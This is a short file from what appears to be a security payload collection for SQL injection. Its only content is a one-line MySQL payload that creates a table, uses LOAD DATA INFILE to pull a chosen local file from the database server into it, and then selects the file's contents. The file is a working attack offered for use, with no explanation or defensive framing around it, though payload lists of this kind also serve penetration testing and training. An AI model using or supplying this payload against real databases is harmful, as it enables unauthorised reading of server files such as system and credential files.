cyber-security-resources/more_payloads/SQLi/mysql-read-local-files.txt
2021-07-28 01:24:01 -04:00

2 lines
105 B
Plaintext

create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;